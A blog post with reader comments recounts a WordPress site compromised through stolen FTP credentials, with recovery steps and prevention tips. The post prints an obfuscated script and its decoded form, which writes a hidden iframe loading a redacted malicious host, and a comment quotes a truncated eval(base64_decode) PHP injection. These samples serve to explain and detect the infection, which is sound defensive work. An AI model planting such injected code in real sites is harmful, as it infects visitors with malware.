ShoutMeLoud – Shouters Who Inspire

Superlinks
≡ Menu
≡ Menu

The Sad Story of My Hacked WordPress Blog And Lessons Learnt

bluehost
The Sad Story of My Hacked WordPress Blog And Lessons Learnt

WordPress is undoubtedly the most preferred blogging platform in the world. WordPress is like Microsoft windows to the blogging world. Till date, this open source software powers almost 19% of websites in the world. Whenever a software gets that famous, the bad guys begin to target it. WordPress, is no exception to this trend.

I write a blog called Interview Mantra that runs on self-hosted wordpress. My website got hacked and I didn’t even come to know of it until my WordPress dashboard crashed two months after getting hacked.

Screenshot Dashboard small 520x394

When I tried to open my blog in browser, I got a trojan horse warning from my anti-virus software.

trojan warning

At the time when my site got hacked, I had no clue how to get this issue sorted. I wanted to get to the root of the problem and safely recover my website with minimal effort.

I viewed the html source of my blog’s homepage and found that a snippet of malicious script was attached just before the tag.

<script language=”javascript”>eval(unescape(“%64%6F%63%75%6D%65

This is an encrypted script, obfuscated on purpose to hide the code. After googling for a while I found a site to decrypt this script.

This was the script after decryption:

<script language=”javascript”>eval(unescape(“document.write(‘<iframe src=”http://xxxxxxxx.org/in.php” width=1 height=1 frameborder=0></iframe>’);”))</script>

Oh my god! This means that this script is trying to call a malicious website inside mine. And that website essentially loaded a trojan in the browser window. Now the million dollar question was, how did this script creep into the html of my blog?

A virus in my windows machine stole my FTP login credentials from the FTP client, FileZilla. Malicious scripts were used to remotely infect my website using the FTP details. I downloaded the copy of wordpress installed on my server to my local computer and compared it with a fresh copy of wordpress. To my horror, I discovered that there was an unknown script attached at the top of few php pages in WordPress application.

I manually removed the scripts from the files and FTPed the files back to the server. Typically the php files with execute permission are infected. Especially the plugin and theme php files are targeted first.

Keep in mind that sometimes, when hackers have obtained FTP access to a website, they will leave behind “backdoors” which allow them to re-infect the website after you’ve changed all FTP passwords and removed their virus from your PC. So be sure to remove all the viruses from your PC.

Below is a summary of steps that I took to recover my wordpress blog.

Steps to recover hacked WordPress blog:

  • Changed my hosting account’s password.
  • Changed FTP account’s password.
  • Changed Database’s password.
  • Even changed my primary email’s password (to be on the safer side)
  • Manually removed the malicious scripts from php files.

After this experience, I’ve learnt my lessons. Here are few tips to you that can prevent your wordpress blog from getting hacked.

Tips to prevent your WordPress from getting hacked:

  • Do not save your login credentials in the FTP client.
  • From time to time, keep changing the passwords of your wordpress admin, FTP and hosting account.
  • Use strong passwords for all your accounts, avoid common passwords.
  • If possible use Linux operating system to FTP (to decrease chances of viruses).
  • Be careful when you install free plugins and themes.
  • Keep your anti-virus updated, in case you are using windows.
  • Keep your wordpress updated to the latest upgrade.

Please note that if your blog gets hacked, the symptoms and the causes may be different from what had happened to my website.

If your wordpress blog gets hacked, don’t panic. Use the following resources to recover your website.

How to recover a hacked WordPress blog:

I hope that this story of my blog getting hacked helps you avoid few mistakes which could otherwise cost a huge loss to your blog.

Also check:

Have you or your friends ever faced such situation? Do let us know your thoughts and what steps do you take to prevent WordPress hacking?

  • Author Bio

  • Latest Post

Article by Sridhar Jammalamadaka

Sridhar has written 3 articles.

If you like This post, you can follow ShoutMeLoud on Twitter. Subscribe to ShoutMeLoud feed via RSS or EMAIL to receive instant updates.

{ 32 comments… add one }

  • Abhishek Taneja

    Wonderful article on recovery of hacked website and security tips ..how can we prevent our website from brute force attacks which make several unauthorised login attempts on our site ???

    Reply
  • Surendra Mishra

    @Rajinder Singh Wordpress sites always at high risk when new malware come over web. So first thing you need to prepare your website to save from such malicious attack. If attached then contact some online scanner company.

    Reply
  • snjflame

    go through filezilla or any other FTP and download and open the index.php file and the paste this and upload and replace the server file —

    Reply
  • Tony Payne

    Good advice. All my Wordpress and HTML based sites got hacked in the last week, and a Bot has been installed. This is more than 10 domains, so really frustrating.

    I changed my passwords, identified the files that were modified (note the dates have not changed for these on the server), and they seem to be index.* and default.* (.php,.htm,.html etc).

    I manually updated all the files using Filezilla and editing live. With the HTML files some had become corrupted, so I had to fix them using my backup copies, and in one case Google’s Cache of the page.

    I thought I had all but 1 site up and fixed, but the next day they were all infected again.

    I am now looking to see how I can prevent this again, and how to truly fix things.

    It’s very frustrating and time consuming, especially if you earn money from your web sites.

    Reply
  • Rajinder Singh

    i never thought that this can happen on wp seriously i thought free premium themes are good but now i ssee reason behind that

    Reply
  • jimmy

    first of all i’m victim of kind of hacked recently and now i don’t have any site running. I didn’t even took any backup of my hosting files.

    just came across this post while googleing it and would say thanks you guys for all useful info.

    Sridhar and Gerald, you guys are awesome. thanks again life saver.

    Reply
  • Manoj

    God I had the same issue, had to get it cleaned from a professional!

    what a nightmare, didnt sleep for few nights!

    Reply
  • Chandrashekhar

    Thanks for sharing your expirience……Here is my horrible story
    My blog hacked by indonasia hacker team x0.hacker on April 22-2010, when i opened my blog i am getting a flashy gif graphics your blog has been hacked by xo.hackers. I shocked, and scared. .So first i deleted my sql database….(i have taken backup of wordpress database a day before hacker attack )then downloaded home directory backup from cpanel and scanned with avast, i found several malicious php scripts uploaded by hackers. I deleted all those scripts from homedirectory and replaced with original script. and reinstalled wordpress databae, Now my blog is return to normal condition.it takes about two days.
    Harsha one question is- if i type my blog title in google search engine i am getting hacked by xo.hackers in place of my blog title, is it possible to remove hacker title from search engine…or search engine takes own time to recover it.

    Reply
  • sriganesh

    that was a very helpful post ! even my blog got hacked once before and it take me 4 days to remove it! better always backup and dont save your password in your pc browser and the auto-fill option , change the password and security question for your hosting and account ftp in a offline( paper or note).
    now it seems many bloggers get spam email for paypal! – beware !!

    Reply
  • Nitesh patel

    awesome article!! sridhar helpfull to all wordpress blogger.
    nice read.

    Reply
  • machbio

    will follow.. all these.. great.. article

    Reply
  • Rajesh Kanuri @ TechCats

    Nice Tips.. your post really comes handy when some thing goes wrong with the weblogs..

    Reply
  • Gerald Weber

    Another thing you can do to be more secure is to IP restrict your wp-admin folder to only your ip address.

    Of course if you have multiple blog authors you can allow their ip addresses as well.

    Reply
  • Sridhar

    Apologize for this Harsh! I was trying to show the reader how a malicious script looks like. Don’t mistake me.

    The above script is absolutely safe by the way. But still the above comment doesn’t seem to parse well. You may choose to delete the comment if you want.
    Thanks.

    Reply
  • Sridhar

    <?php /**/ eval(base64_decode("atYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlz==">

    Sorry this html snippet got lost in my previous comment. I have escaped it this time.

    Reply
  • Imran Yousaf

    This should be included in Ripleys’ believe it or not. You catched the virus/script with the help of your virus. Is there any way we can scan our website for such type of things?

    Reply
    • Sridhar

      Good way to scan for malicious scripts(such as the one I mentioned above) in your website is to download a copy of wordpress to your local machine and use file search tools such as grep or wingrep to find occurrence of string “eval(base64_decode”.

      And remember, not all the scripts that contain line “eval(base64_decode” are infected, only the ones that look suspicious, something like this:

      Reply
  • Brett Borders

    thanks for this great write up… one of my blogs got hacked… you can’t be too careful!

    Reply
    • Sridhar Jammalamadaka

      Thanks for your comment Brett. Guess you are right, one can’t be too careful about this. A wordpress blog getting hacked is as common as a windows PC getting a computer virus. We can only do our best to prevent an attack by following simple tips, such as keeping wordpress up to date and to following the tips in the article written by Matt Cutts(see Gerald Weber’s comment below).

      Reply
  • Ankit

    The same case was mine cousin too, but he didn’t solve the problem yet. Actually he is not able to loggin via FTP and doesn’t have access to cPanel too. :(

    Reply
  • Sridhar

    Thanks guys! I’m glad that you liked my article. Share your experience in comments, if your blog had got hacked.

    Reply
    • Arijit Das

      Hey Sridhar! You site is still infected… my antivirus indicated!

      Reply
      • Sridhar

        Thanks for the comment Arijit. I had just sent you a tweet. Am shocked to know that your anti virus indicated that my site still has infection.

        Reply
  • Blogger Template

    thanks for the lesson. I thinks we should use a legal themes, plugin, and another else. Make sure before download one things.

    Reply
  • Siddhu

    Things can get messy when you want them free :P nice tips to recover the site….

    Reply
  • Typhoon

    One nice plugin called Exploit Scanner may look useful in such cases. It scans your database and tells suspicious files.

    Once, my blog had such problem in which Google found malicious pages and showed warning to the people who were trying to access the blog. Upon scanning with that plugin I found that various iframe viruses got attached at the end of many files. They got into the server from my own PC while uploading a file and then it got spread over many other files.

    Exploit Scanner is a nice tool but it requires a good server as it requires a bit of higher RAM which is not available on shared hosting.

    Reply
  • Anil Gupta

    Lots of learning lessons for all of us and some tips that we should follow to avoid our blog being hacked

    Reply
  • fareed

    great tips sridhar
    In 2008 i start a blog and i use wordpress platform for my blogging,hackers hack my blog by putting tag they put some virus link in to my code, i clear the link everyday but they put the link very next hour when i remove the iframe , i get sick mentally then i leave blogging few months now i am a part time blogger

    Reply
    • NpXp

      Wow, so you quit blogging full time because your blog was hacked??

      Hmm that’s bad, you should have taken help from other people in the community!

      Reply

Leave a Comment